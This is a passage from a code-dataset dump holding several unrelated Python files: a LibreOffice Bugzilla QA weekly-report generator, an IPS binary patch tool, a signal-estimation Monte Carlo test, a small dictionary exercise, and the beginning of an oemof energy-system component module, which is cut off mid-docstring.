+ addedStatus\n if keyValue not in statList['status_changed']:\n statList['status_changed'][keyValue] = {'id':[], 'author':[]}\n statList['status_changed'][keyValue]['id'].append(rowId)\n statList['status_changed'][keyValue]['author'].append(actionMail)\n\n elif change['field_name'] == 'resolution':\n addedResolution = change['added']\n removedResolution = change['removed']\n\n if oldStatus:\n removedStatus = oldStatus + \"_\" + removedResolution\n oldStatus = None\n else:\n oldResolution = removedResolution\n\n if newStatus:\n addedStatus = newStatus + \"_\" + addedResolution\n\n if actionDate >= cfg['reportPeriod']:\n keyValue = removedStatus + '-' + addedStatus\n if keyValue not in statList['status_changed']:\n statList['status_changed'][keyValue] = {'id':[], 'author':[]}\n statList['status_changed'][keyValue]['id'].append(rowId)\n statList['status_changed'][keyValue]['author'].append(actionMail)\n\n newStatus = None\n else:\n newResolution = addedResolution\n\n elif change['field_name'] == 'priority':\n newPriority = change['added']\n if actionDate >= cfg['reportPeriod'] and newPriority == row['priority']:\n statList['priority_changed'][newPriority]['id'].append(rowId)\n statList['priority_changed'][newPriority]['author'].append(actionMail)\n\n\n elif change['field_name'] == 'severity':\n newSeverity = change['added']\n if actionDate >= cfg['reportPeriod'] and newSeverity == row['severity']:\n statList['severity_changed'][newSeverity]['id'].append(rowId)\n statList['severity_changed'][newSeverity]['author'].append(actionMail)\n\n elif change['field_name'] == 'keywords':\n keywordsAdded = change['added'].split(\", \")\n for keyword in keywordsAdded:\n if keyword in common.keywords_list:\n\n if actionDate >= cfg['reportPeriod'] and keyword in rowKeywords:\n statList['keyword_added'][keyword]['id'].append(rowId)\n statList['keyword_added'][keyword]['author'].append(actionMail)\n\n keywordsRemoved = change['removed'].split(\", \")\n for keyword in keywordsRemoved:\n if keyword in common.keywords_list:\n\n if actionDate >= cfg['reportPeriod'] and keyword not in rowKeywords:\n statList['keyword_removed'][keyword]['id'].append(rowId)\n statList['keyword_removed'][keyword]['author'].append(actionMail)\n\n elif change['field_name'] == 'whiteboard':\n for whiteboard in change['added'].split(' '):\n if 'backportrequest' in whiteboard.lower():\n\n if actionDate >= cfg['reportPeriod'] and whiteboard in row['whiteboard']:\n if whiteboard not in statList['whiteboard_added']:\n statList['whiteboard_added'][whiteboard] = {'id':[], 'author':[]}\n\n statList['whiteboard_added'][whiteboard]['id'].append(rowId)\n statList['whiteboard_added'][whiteboard]['author'].append(actionMail)\n\n\n for whiteboard in change['removed'].split(' '):\n if 'backportrequest' in whiteboard.lower():\n\n if actionDate >= cfg['reportPeriod'] and whiteboard not in row['whiteboard']:\n if whiteboard not in statList['whiteboard_removed']:\n statList['whiteboard_removed'][whiteboard] = {'id':[], 'author':[]}\n\n statList['whiteboard_removed'][whiteboard]['id'].append(rowId)\n statList['whiteboard_removed'][whiteboard]['author'].append(actionMail)\n\n elif change['field_name'] == 'op_sys':\n newSystem = change['added']\n\n if actionDate >= cfg['reportPeriod'] and newSystem in row['op_sys']:\n statList['system_changed'][newSystem]['id'].append(rowId)\n statList['system_changed'][newSystem]['author'].append(actionMail)\n\n commentMail = None\n comments = row['comments'][1:]\n for idx, comment in enumerate(comments):\n commentMail = comment['creator']\n commentDate = datetime.datetime.strptime(comment['time'], \"%Y-%m-%dT%H:%M:%SZ\")\n\n common.util_check_bugzilla_mail(statList, commentMail, '', commentDate, rowId)\n\n if commentDate >= cfg['reportPeriod'] and \\\n commentMail != \"libreoffice-commits@lists.freedesktop.org\" and\\\n commentMail != \"qa-admin@libreoffice.org\" and\\\n comment['text'] != 'A polite ping, still working on this bug?':\n if commentMail not in statList['comments_count']:\n statList['comments_count'][commentMail] = 0\n statList['comments_count'][commentMail] += 1\n\n for person in row['cc_detail']:\n email = person['email']\n if commentMail == email or actionMail == email:\n common.util_check_bugzilla_mail(statList, email, person['real_name'])\n\n elif row['summary'].lower().startswith('[meta]'):\n statList['metabugAlias'][rowId] = row['alias']\n\n for k, v in statList['people'].items():\n if not statList['people'][k]['name']:\n statList['people'][k]['name'] = statList['people'][k]['email'].split('@')[0]\n\n if statList['people'][k]['oldest'] >= cfg['reportPeriod']:\n statList['newUsers'][k] = statList['people'][k]\n\n statList['people'][k]['oldest'] = statList['people'][k]['oldest'].strftime(\"%Y-%m-%d\")\n statList['people'][k]['newest'] = statList['people'][k]['newest'].strftime(\"%Y-%m-%d\")\n\n statList['stat']['newest'] = statNewDate.strftime(\"%Y-%m-%d\")\n statList['stat']['oldest'] = statOldDate.strftime(\"%Y-%m-%d\")\n print(\" from \" + statList['stat']['oldest'] + \" to \" + statList['stat']['newest'])\n\ndef util_print_QA_line_weekly(fp, statList, dValue, action, isMetabug=False):\n\n #Replace metabugs keys by aliases\n if isMetabug:\n dValueAux = {}\n for key, value in dValue.items():\n if int(key) in statList['metabugAlias'] and \\\n statList['metabugAlias'][int(key)]:\n dValueAux[statList['metabugAlias'][int(key)][0]] = dValue[key]\n dValue = dValueAux\n\n for key, value in sorted(dValue.items()):\n if value['id']:\n nBugs = len(value['id'])\n if nBugs == 1:\n aux1 = 'bug has'\n aux2 = 'bug'\n else:\n aux1 = \"bugs have\"\n aux2 = 'bugs'\n\n if action == 'added' or action == 'removed':\n aux3 = 'to'\n if action == 'removed':\n aux3 = 'from'\n print((' * \\'{}\\' has been {} {} {} {}.').format(key, action, aux3, nBugs, aux2), file=fp)\n elif action == 'changedStatus':\n statuses = key.replace('_', ' ').split('-')\n print((' * {} {} been changed from \\'{}\\' to \\'{}\\'.').format(nBugs, aux1, statuses[0], statuses[1]), file=fp)\n else:\n print((' * {} {} been changed to \\'{}\\'.').format(nBugs, aux1, key.replace('_', ' ')), file=fp)\n\n common.util_create_short_url(fp, value['id'])\n #Count the number of reps\n my_dict = {i: value['author'].count(i) for i in value['author']}\n\n d_view = [(v, k) for k, v in my_dict.items()]\n\n d_view.sort(reverse=True)\n print('\\t\\t+ Done by:', file=fp)\n\n text = \" \"\n for i1,i2 in d_view:\n personString = statList['people'][i2]['name'] + ' (' + str(i1) + ')'\n # Reduce lines to 72 characters, for some reason the emails are cut otherwise\n if len( text + \" \" + personString ) < 72:\n text += personString + \", \"\n else:\n print(text, file=fp)\n text = \" \" + personString + \", \"\n if text != \" \":\n print(text[:-2], file=fp)\n\n print(file=fp)\n\ndef create_weekly_Report(statList) :\n print('QA report from {} to {}'.format(cfg['reportPeriod'].strftime(\"%Y-%m-%d\"), statList['stat']['newest']))\n fp = open('/tmp/weekly_report.txt', 'w', encoding='utf-8')\n\n print('Hello,', file=fp)\n print(file=fp)\n print('What have happened in QA in the last {} days?'.format(reportPeriodDays), file=fp)\n print(file=fp)\n\n #Count the number of reps\n my_dict = {i: statList['created']['author'].count(i) for i in statList['created']['author']}\n\n d_view = [(v, k) for k, v in my_dict.items()]\n\n print(' * {} bugs have been reported by {} people.'.format(\\\n len(statList['created']['id']),\n len(d_view)), file=fp)\n\n common.util_create_short_url(fp, statList['created']['id'])\n print(file=fp)\n\n d_view.sort(reverse=True)\n print(' * Top 10 reporters:', file=fp)\n\n it = 0\n for i1,i2 in d_view:\n if it >= 10:\n break\n print('\\t\\t+ ' + statList['people'][i2]['name'] + ' (' + str(i1) + ')', file=fp)\n it += 1\n\n print(file=fp)\n\n d_view = sorted(statList['comments_count'].items(), key=lambda kv: kv[1], reverse=True)\n\n print(' * Top 10 commenters:', file=fp)\n\n it = 0\n for i in d_view:\n if it >= 10:\n break\n print('\\t\\t+ ' + statList['people'][i[0]]['name'] + ' (' + str(i[1]) + ')', file=fp)\n it += 1\n\n print(file=fp)\n print(\" * {} bugs reported haven't been triaged yet.\".format(\\\n len(statList['still_unconfirmed'])), file=fp)\n\n common.util_create_short_url(fp, statList['still_unconfirmed'])\n print(file=fp)\n\n print(\" * Total number of unconfirmed bugs: {}\".format(\\\n len(statList['unconfirmed'])), file=fp)\n print(file=fp)\n\n print(' * {} comments have been written by {} people.'.format(\n sum(statList['comments_count'].values()), len(statList['comments_count'])), file=fp)\n print(file=fp)\n\n print(' * {} new people have signed up to Bugzilla.'.format(len(statList['newUsers'])), file=fp)\n print(file=fp)\n\n if statList['status_changed']:\n print(\"== STATUSES CHANGED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['status_changed'], 'changedStatus')\n\n if statList['keyword_added']:\n print(\"== KEYWORDS ADDED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['keyword_added'], 'added')\n\n if statList['keyword_removed']:\n print(\"== KEYWORDS REMOVED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['keyword_removed'], 'removed')\n\n if statList['whiteboard_added']:\n print(\"== BACKPORTREQUEST ADDED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['whiteboard_added'], 'added')\n\n if statList['whiteboard_removed']:\n print(\"== BACKPORTREQUEST REMOVED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['whiteboard_removed'], 'removed')\n\n if statList['severity_changed']:\n print(\"== SEVERITY CHANGED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['severity_changed'], 'changed')\n\n if statList['priority_changed']:\n print(\"== PRIORITY CHANGED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['priority_changed'], 'changed')\n\n if statList['system_changed']:\n print(\"== SYSTEM CHANGED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['system_changed'], 'changed')\n\n if statList['metabug_added']:\n print(\"== METABUGS ADDED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['metabug_added'], 'added', True)\n\n if statList['metabug_removed']:\n print(\"== METABUG REMOVED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['metabug_removed'], 'removed', True)\n\n print('Thank you all for making Libreoffice rock!', file=fp)\n print(file=fp)\n print('Generated on {} based on stats from {}. Note: Metabugs are ignored.'.format(\n datetime.datetime.now().strftime(\"%Y-%m-%d\"), statList['stat']['newest']), file=fp)\n print(file=fp)\n print('Regards', file=fp)\n fp.close()\n\ndef runCfg():\n cfg = {}\n cfg['reportPeriod'] = common.util_convert_days_to_datetime(reportPeriodDays)\n\n return cfg\n\nif __name__ == '__main__':\n print(\"Reading and writing data to \" + common.dataDir)\n\n cfg = runCfg()\n\n bugzillaData = common.get_bugzilla()\n\n statList = util_create_statList_weeklyReport()\n\n analyze_bugzilla_weeklyReport(statList, bugzillaData, cfg)\n\n create_weekly_Report(statList)\n\n print('End of report')\n","sub_path":"qa/createWeeklyReport.py","file_name":"createWeeklyReport.py","file_ext":"py","file_size_in_byte":20241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"428915684","text":"#!/usr/bin/env python3\n\nimport struct\nimport argparse\n\ndef create_ips(file1_content, file2_content):\n return Patch.create(file1_content, file2_content).encode()\n\ndef apply_ips(file_content, patch_content):\n patch = Patch(patch_content)\n return patch.apply(file_content)\n\nclass Patch:\n def __init__(self, ips_content=None):\n self.records = []\n if ips_content and ips_content[:5] == b'PATCH' and ips_content[-3:] == b'EOF':\n # trim 'PATCH' from the beginning and 'EOF' from the end.\n ips_ptr = 0\n ips_content = ips_content[5:-3]\n # parse the patches\n while (ips_ptr < len(ips_content)):\n record_meta = struct.unpack_from(\">BHH\", ips_content, ips_ptr)\n ips_ptr += 5\n record_addr = record_meta[0] << 16 | record_meta[1]\n record_size = record_meta[2]\n if record_size:\n record_content = struct.unpack_from(\"B\" * record_size, ips_content, \n ips_ptr)\n ips_ptr += record_size\n self.records.append(Record(record_addr, record_content))\n else: #run length encoded\n record_size = struct.unpack_from(\">H\", ips_content, ips_ptr)[0]\n ips_ptr += 2\n record_content = struct.unpack_from(\"B\", ips_content, ips_ptr)[0]\n ips_ptr += 1\n self.records.append(Record(record_addr, record_content, record_size))\n \n def apply(self, orig_content):\n if not isinstance(orig_content, bytearray):\n orig_content = bytearray(orig_content)\n for record in self.records:\n record.apply(orig_content)\n return orig_content\n\n def encode(self):\n encoded = b''.join([r.encode() for r in self.records])\n return b''.join((b'PATCH', encoded, b'EOF'))\n\n def add_record(self, address, content, rle_size=None):\n for r in self.records:\n if r.address == address:\n r.set_content(content)\n return\n self.records.append(Record(address, content, rle_size))\n\n def add_records(self, patchdict):\n for addr,value in patchdict.items():\n self.add_record(addr, value)\n\n def clear(self):\n self.records = []\n\n def combine(self, patch):\n self.records = self.records + patch.records\n\n @staticmethod\n def create(orig_content, patched_content):\n p = Patch()\n if not len(orig_content) <= len(patched_content):\n raise ValueError(\"Original file is larger than patched file.\")\n diff_start = -1\n diff_end = -1\n for i in range(len(patched_content)):\n if i >= len(orig_content) or not orig_content[i] == patched_content[i]:\n if diff_start < 0:\n diff_start = i\n diff_end = i\n if diff_end >= 0 and (i - diff_end >= 5 or i == len(patched_content) - 1):\n p.add_record(diff_start, patched_content[diff_start:diff_end+1])\n diff_start = -1\n diff_end = -1\n\n return p\n\nclass Record:\n def __init__(self, address, content=None, rle_size=None):\n self.address = address \n self.rle_size = rle_size #RLE records only\n if content is not None:\n self.set_content(content)\n\n def set_addr(self, addr):\n self.address = addr\n\n def set_content(self, content):\n try:\n if len(content) > 1 and self.rle_size:\n raise ValueError(\"RLE records may only contain one byte of content, \"\n \"%d bytes provided\" % len(content))\n self.content = bytearray(content)\n except TypeError:\n self.content = bytearray((content,))\n\n def size(self):\n if self.rle_size:\n return self.rle_size\n if self.content:\n return len(self.content)\n else:\n return 0\n\n def encode(self):\n if self.rle_size: #RLE record\n return struct.pack('>BHHHB', self.address >> 16, self.address & 0xffff, 0,\n self.rle_size, int(self.content[0]))\n return struct.pack('>BHH' + 'B' * self.size(), self.address >> 16, \n self.address & 0xffff, self.size(), *[int(b) for b in self.content])\n\n def apply(self, orig_content):\n size = self.size()\n if self.rle_size:\n orig_content[self.address:self.address+size] = self.content * size\n elif size:\n orig_content[self.address:self.address+size] = self.content\n \n \ndef main():\n parser = argparse.ArgumentParser(prog=\"ips\",\n description=\"A utility for creating and appying IPS patches\")\n parser.add_argument(\"-o\",\"--output\", type=str,\n help=\"The file name to be written.\")\n parser.add_argument(\"file1\", help=\"The first input file\")\n parser.add_argument(\"file2\", help=\"The second input file\")\n args = parser.parse_args()\n\n patch_content = None\n\n file1 = open(args.file1, 'rb')\n file1_content = file1.read()\n file1.close()\n file2 = open(args.file2, 'rb')\n file2_content = file2.read()\n file2.close()\n\n if file1_content[:5] == b'PATCH':\n patch_content, patch_name = file1_content, args.file1\n file_content, file_name = file2_content, args.file2\n elif file2_content[:5] == b'PATCH':\n patch_content, patch_name = file2_content, args.file2\n file_content, file_name = file1_content, args.file1\n \n if patch_content:\n out = apply_ips(file_content, patch_content)\n if not args.output:\n try:\n patch_name_without_ext = patch_name[:patch_name.rindex('.')]\n except ValueError:\n patch_name_without_ext = patch_name\n try:\n ext = file_name[file_name.rindex('.'):]\n except ValueError:\n ext = '.patched'\n args.output = patch_name_without_ext + ext\n else:\n out = create_ips(file1_content, file2_content)\n if not args.output:\n args.output = args.file2 + '.ips'\n \n outfile = open(args.output, 'wb')\n outfile.write(out)\n outfile.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"legacy/ips.py","file_name":"ips.py","file_ext":"py","file_size_in_byte":5590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363425704","text":"from context import parametric_analysis\nimport parametric_analysis.current_signal_model.signal_model as mdl\nimport parametric_analysis.current_signal_model.bounds as app_bnd\nimport parametric_analysis.nonlinear_signal_model.estimators as est\nimport parametric_analysis.nonlinear_signal_model.bounds as bnd\nimport parametric_analysis.monte_carlo.simulations as mc\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom copy import copy\n\nN=1000\nFe=1000\nL1=2\nL2=3\n\n# Construct Signal Model\nw=2*np.pi*np.array([50,4.3])/Fe\n\nL=L1+L2+1\na=np.array([0.1,0.3,1,0.2,0.5,0.1])\nphi=np.zeros(L)\ntheta=np.hstack((a*np.cos(phi),a*np.sin(phi)))\n\nsignal=mdl.Interharmonic_Current_Signal_Model(L1,L2,N=N,w=w,theta=theta,sigma2=0.1,Fe=Fe)\nsignal.setattr(\"SNR\",20)\n\n#show signal and spectrum\nsignal.plot()\nplt.figure()\nsignal.plot_spectrum()\nplt.show()\n\n#Construct estimator\nsignal_estimator=mdl.Interharmonic_Current_Signal_Model(L1,L2,Fe=Fe)\nsignal_estimator.estimator_w=est.ML_Estimator_w(copy(signal_estimator),w+0.001) # the signal model must be passed to the constructor since the ML estimator requires the knowledge of the get_H() method\n\n#Construct Bounds\nbound0=bnd.CRB_Bounds(signal)\nbound1=app_bnd.Interharmonic_CRB_Bounds(signal)\n\n#Construct Monte Carlo Estimation\nsimulation_config={\"object\":\"signal\",\"attribute\":\"N\", \"values\":np.arange(50,600,50)}\nmc_est=mc.Monte_Carlo_Estimation(simulation_config,signal,signal_estimator,[bound0,bound1],signal_attributes_short_list=[\"w\"],Ntest=100)\nmc_est.simulate()\nmc_est.plot()\n\nplt.show()\n","sub_path":"tests/test_estimation_MCSA.py","file_name":"test_estimation_MCSA.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"213511303","text":"import math\r\n\r\nclass Classe:\r\n def remove(self, dict):\r\n del dict['clodoaldo']\r\n print(f'RESULTADO = {dict}')\r\n\r\n \r\nresposta = Classe();\r\n\r\ndict = {'joao': 'pedreiro', 'maria': 'advogada', 'jose': 'telefonista', 'bianca': 'gerente', 'clodoaldo': 'piloto'}\r\nresposta.remove(dict)\r\n\r\n\r\n","sub_path":"Exer31.py","file_name":"Exer31.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"243803851","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Creates oemof energy system components.\n\n Functions for the creation of oemof energy system objects from a\n given set of object parameters.\n\n Contributors:\n\n - Christian Klemm - christian.klemm@fh-muenster.de\n - Gregor Becker - gb611137@fh-muenster.de\n\"\"\"\n\nfrom oemof import solph\nimport logging\nimport os\nimport pandas as pd\nfrom feedinlib import *\nimport demandlib.bdew as bdew\nimport datetime\nimport numpy\n\n\ndef buses(nodes_data: dict, nodes: list) -> dict:\n \"\"\"\n Creates bus objects.\n Creates bus objects with the parameters given in 'nodes_data' and\n adds them to the list of components 'nodes'.\n\n :param nodes_data: dictionary containing parameters of the buses\n to be created.\n The following parameters have to be provided:\n\n - label,\n - active,\n - excess,\n - shortage,\n - shortage costs,\n - excess costs\n :type nodes_data: dict\n :param nodes: list of components created before (can be empty)\n :type nodes: list\n\n :return busd: dictionary containing all buses created\n :rtype: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # creates a list of buses\n busd = {}\n \n # Creates components, which are defined within the \"buses\"-sheet of\n # the original excel-file\n for i, b in nodes_data['buses'].iterrows():\n # Create a bus object for every bus, which is marked as \"active\"\n if b['active']:\n # creates an oemof-bus object\n bus = solph.Bus(label=b['label'])\n # adds the bus object to the list of components \"nodes\"\n nodes.append(bus)\n busd[b['label']] = bus\n # returns logging info\n logging.info(' ' + 'Bus created: ' + b['label'])\n \n # Create an sink for every bus, which is marked with\n # \"excess\"\n if b['excess']:\n # creates the oemof-sink object and\n # directly adds it to the list of components \"nodes\"\n inputs = {\n busd[b['label']]:\n solph.Flow(variable_costs=b['excess costs'],\n emission_factor=b[\n 'excess constraint costs'])}\n nodes.append(\n solph.Sink(\n label=b['label'] + '_excess',\n inputs=inputs))\n \n # Create a source for every bus, which is marked with\n # \"shortage\"\n if b['shortage']:\n # creates the oemof-source object and\n # directly adds it to the list of components \"nodes\"\n outputs = {\n busd[b['label']]:\n solph.Flow(\n variable_costs=b['shortage costs'],\n emission_factor=b[\n 'shortage constraint costs'])}\n nodes.append(\n solph.Source(\n label=b['label'] + '_shortage',\n outputs=outputs))\n # Returns the list of buses as result of the function\n return busd\n\n\nclass Sources:\n \"\"\"\n Creates source objects.\n\n\n #def create_source(self, so, timeseries_args, output):\n Creates an oemof source with fixed or unfixed timeseries\n\n There are four options for labeling source objects to be created:\n\n - 'commodity': a source with flexible time series\n - 'timeseries': a source with predefined time series\n - 'photovoltaic': a photovoltaic component\n - 'wind power': a wind power component\n\n :param nodes_data: dictionary containing parameters of sources\n to be created.The following data have to be\n provided:\n\n - 'label'\n - 'active'\n - 'fixed'\n - 'output'\n - 'technology'\n - 'variable costs / (CU / kWh)'\n - 'existing capacity / (kW)'\n - 'min.investment capacity / (kW)'\n - 'max.investment capacity / (kW)'\n - 'periodical costs / (CU / (kW a))'\n - 'non-convex investment'\n - 'Fix Investment Cost / (CU/a)'\n - 'Turbine Model (Windpower ONLY)'\n - 'Hub Height (Windpower ONLY)'\n - 'technology database(PV ONLY)'\n - 'inverter database(PV ONLY)'\n - 'Modul Model(PV ONLY)'\n - 'Inverter Model(PV ONLY)'\n - 'Azimuth(PV ONLY)'\n - 'Surface Tilt(PV ONLY)'\n - 'Albedo(PV ONLY)'\n - 'Altitude(PV ONLY)'\n - 'Latitude(PV ONLY)'\n - 'Longitude(PV ONLY)'\n :type nodes_data: dict\n :param busd: dictionary containing the buses of the energy system\n :type busd: dict\n :param nodes: list of components created before(can be empty)\n :type nodes: list\n :param filepath: path to .xlsx scenario-file containing a\n \"weather data\" sheet with timeseries for\n\n - \"dhi\"(diffuse horizontal irradiation)\n W / m ^ 2\n - \"dirhi\"(direct horizontal irradiance)\n W / m ^ 2\n - \"pressure\" in Pa\n - \"temperature\" in °C\n - \"windspeed\" in m / s\n - \"z0\"(roughness length) in m\n :type filepath: str\n\n Contributors:\n\n - Christian Klemm - christian.klemm@fh-muenster.de\n - Gregor Becker - gregor.becker@fh-muenster.de\n \"\"\"\n \n def create_source(self, so: dict, timeseries_args: dict, output=None):\n \"\"\"\n Creates an oemof source with fixed or unfixed timeseries\n \n :param so: dictionary containing all information for the\n creation of an oemof source. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'output'\n - 'periodical costs'\n - 'min. investment capacity'\n - 'max. investment capacity'\n - 'existing capacity'\n - 'non-convex investment'\n - 'fix investment costs'\n - 'variable costs'\n :type so: dict\n :param timeseries_args: dictionary rather containing the\n 'fix-attribute' or the 'min-' and\n 'max-attribute' of a source\n :type timeseries_args: dict\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # output default\n if output is None:\n output = self.busd[so['output']]\n # set variables minimum, maximum and existing\n if str(so['input']) in ['0', 'None', 'none', 'nan']:\n minimum = so['min. investment capacity']\n maximum = so['max. investment capacity']\n existing = so['existing capacity']\n # set variables minimum, maximum and existing for solar thermal heat\n # sources\n else:\n minimum = so['min. investment capacity'] * \\\n so['Conversion Factor']\n maximum = so['max. investment capacity'] * \\\n so['Conversion Factor']\n existing = so['existing capacity'] * \\\n so['Conversion Factor']\n # Creates a oemof source and appends it to the nodes_sources\n # (variable of the create_sources-class) list\n self.nodes_sources.append(\n solph.Source(\n label=so['label'],\n outputs={output: solph.Flow(\n investment=solph.Investment(\n ep_costs=so[\n 'periodical costs'],\n periodical_constraint_costs=so[\n 'periodical constraint costs'],\n minimum=minimum,\n maximum=maximum,\n existing=existing,\n nonconvex=True if\n so['non-convex investment'] == 1\n else False,\n offset=so[\n 'fix investment costs']),\n **timeseries_args,\n variable_costs=so['variable costs'],\n emission_factor=so[\n 'variable constraint costs']\n )}\n ))\n \n def commodity_source(self, so: dict):\n \"\"\"\n Creates an oemof source object with flexible time series\n (no maximum or minimum) with the use of the create_source\n method.\n\n :param so: dictionary containing all information for the\n creation of an oemof source. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n :type so: object\n\n Christian Klemm - christian.klemm@fh-muenster.de\n\n \"\"\"\n # starts the create_source method with the parameters\n # min = 0 and max = 1\n self.create_source(so, {'min': 0, 'max': 1}, self.busd[so['output']])\n \n # Returns logging info\n logging.info(' ' + 'Commodity Source created: ' + so['label'])\n \n def timeseries_source(self, so: dict, time_series):\n \"\"\"\n Creates an oemof source object from a pre-defined\n timeseries with the use of the create_source method.\n\n :param so: dictionary containing all information for the\n creation of an oemof source. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'output'\n - 'periodical costs'\n - 'min. investment capacity'\n - 'max. investment capacity'\n - 'existing capacity'\n - 'non-convex investment'\n - 'fix investment costs'\n - 'variable costs'\n :type so: dict\n :param filepath: path to .xlsx scenario-file containing a\n \"time_series\" sheet\n :type filepath: str\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n \n if so['fixed'] == 1:\n # sets the timeseries attribute for a fixed source\n args = {'fix': time_series[so['label'] + '.fix'].tolist()}\n elif so['fixed'] == 0:\n # sets the timeseries attributes for an unfixed source\n args = {'min': time_series[so['label'] + '.min'].tolist(),\n 'max': time_series[so['label'] + '.max'].tolist()}\n else:\n raise SystemError(so['label'] + \" Error in fixed attribute\")\n \n # starts the create_source method with the parameters set before\n self.create_source(so, args, self.busd[so['output']])\n \n # Returns logging info\n logging.info(' ' + 'Timeseries Source created: ' + so['label'])\n\n def pv_source(self, so: dict, my_weather_pandas_dataframe):\n \"\"\"\n Creates an oemof photovoltaic source object.\n\n Simulates the yield of a photovoltaic system using feedinlib\n and creates a source object with the yield as time series\n and the use of the create_source method.\n\n :param so: dictionary containing all information for the\n creation of an oemof source. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'fixed'\n - 'Azimuth (PV ONLY)'\n - 'Surface Tilt (PV ONLY)'\n - 'Modul Model (PV ONLY)'\n - 'Inverter Model (PV ONLY)'\n - 'Albedo (PV ONLY)'\n - 'Latitude (PV ONLY)'\n - 'Longitude (PV ONLY)'\n :type so: dict\n :param my_weather_pandas_dataframe: Dataframe containing:\n \n - 'dirhi'\n - 'dhi'\n - 'temperature'\n - 'windspeed'\n :type my_weather_pandas_dataframe: pandas.core.frame.Dataframe\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n # reads pv system parameters from parameter dictionary\n # nodes_data\n parameter_set = {\n 'azimuth': so['Azimuth'],\n 'tilt': so['Surface Tilt'],\n 'module_name': so['Modul Model'],\n 'inverter_name': so['Inverter Model'],\n 'albedo': so['Albedo']}\n \n # sets pv system parameters for pv_module\n pv_module = powerplants.Photovoltaic(**parameter_set)\n \n # calculates global horizontal irradiance from diffuse (dhi)\n # and direct irradiance and adds it to the weather data frame\n my_weather_pandas_dataframe['ghi'] = \\\n (my_weather_pandas_dataframe.dirhi\n + my_weather_pandas_dataframe.dhi)\n \n # changes names of data columns,\n # so it fits the needs of the feedinlib\n name_dc = {'temperature': 'temp_air', 'windspeed': 'v_wind'}\n my_weather_pandas_dataframe.rename(columns=name_dc)\n \n # calculates time series normed on 1 kW pv peak performance\n feedin = pv_module.feedin(\n weather=my_weather_pandas_dataframe,\n location=(so['Latitude'], so['Longitude']),\n scaling='peak_power')\n \n # Prepare data set for compatibility with oemof\n for i in range(len(feedin)):\n # Set negative values to zero\n # (requirement for solving the model)\n if feedin[i] < 0:\n feedin[i] = 0\n # Set values greater 1 to 1\n # (requirement for solving the model)\n if feedin[i] > 1:\n feedin[i] = 1\n # Replace 'nan' value with 0\n feedin = feedin.fillna(0)\n if so['fixed'] == 1:\n # sets the attribute for a fixed pv_source\n args = {'fix': feedin}\n elif so['fixed'] == 0:\n # sets the attributes for an unfixed pv_source\n args = {'min': 0, 'max': feedin}\n else:\n raise SystemError(so['label'] + \" Error in fixed attribute\")\n \n # starts the create_source method with the parameters set before\n self.create_source(so, args, self.busd[so['output']])\n \n # returns logging info\n logging.info(' ' + 'Source created: ' + so['label'])\n\n def windpower_source(self, so: dict, weather_df_wind):\n \"\"\"\n Creates an oemof windpower source object.\n\n Simulates the yield of a windturbine using feedinlib and\n creates a source object with the yield as time series and the\n use of the create_source method.\n\n :param so: dictionary containing all information for the\n creation of an oemof source. At least the\n following key-value-pairs have to be included:\n\n - 'label'\n - 'fixed'\n - 'Turbine Model (Windpower ONLY)'\n - 'Hub Height (Windpower ONLY)'\n :type so: dict\n :param weather_df_wind: Dataframe containing:\n \n - 'windspeed'\n - 'temperature'\n - 'z0'\n - 'pressure'\n :type weather_df_wind: pandas.core.frame.Dataframe\n\n Christian Klemm - christian.klemm@fh-muenster.de\n \"\"\"\n \n # set up wind turbine using the wind turbine library.\n # The turbine name must correspond to an entry in the turbine\n # data-base of the feedinlib. Unit of the hub height is m.\n turbine_data = {\n 'turbine_type': so['Turbine Model'],\n 'hub_height': so['Hub Height']}\n wind_turbine = WindPowerPlant(**turbine_data)\n\n data_height = {'pressure': 0, 'temperature': 2, 'wind_speed': 10,\n 'roughness_length': 0}\n weather_df_wind = \\\n weather_df_wind[['windspeed', 'temperature', 'z0', 'pressure']]\n weather_df_wind.columns = \\\n [['wind_speed', 'temperature', 'roughness_length', 'pressure'],\n [data_height['wind_speed'], data_height['temperature'],\n data_height['roughness_length'], data_height['pressure']]]\n \n # calculate scaled feed-in\n feedin_wind_scaled = wind_turbine.feedin(\n weather=weather_df_wind, scaling='nominal_power')\n if so['fixed'] == 1:\n # sets the attribute for a fixed windpower_source\n args = {'fix': feedin_wind_scaled}\n \n elif so['fixed'] == 0:\n # sets the attribute for an unfixed windpower_source\n args = {'min': 0, 'max': feedin_wind_scaled}\n else:\n raise SystemError(so['label'] + \" Error in fixed attribute\")\n \n # starts the create_source method with the parameters set before\n self.create_source(so, args, self.busd[so['output']])\n \n # returns logging info\n logging.info(' ' + 'Source created: ' + so['label'])\n\n def solar_heat_source(self, so, data):\n \"\"\"\n Creates a solar thermal collector source object.\n\n Calculates the yield of a solar thermal flat plate collector\n or a concentrated solar power collector as time series by\n using oemof.thermal and the create_source method.\n\n The following key-value-pairs have to be included in the\n keyword arguments:\n\n 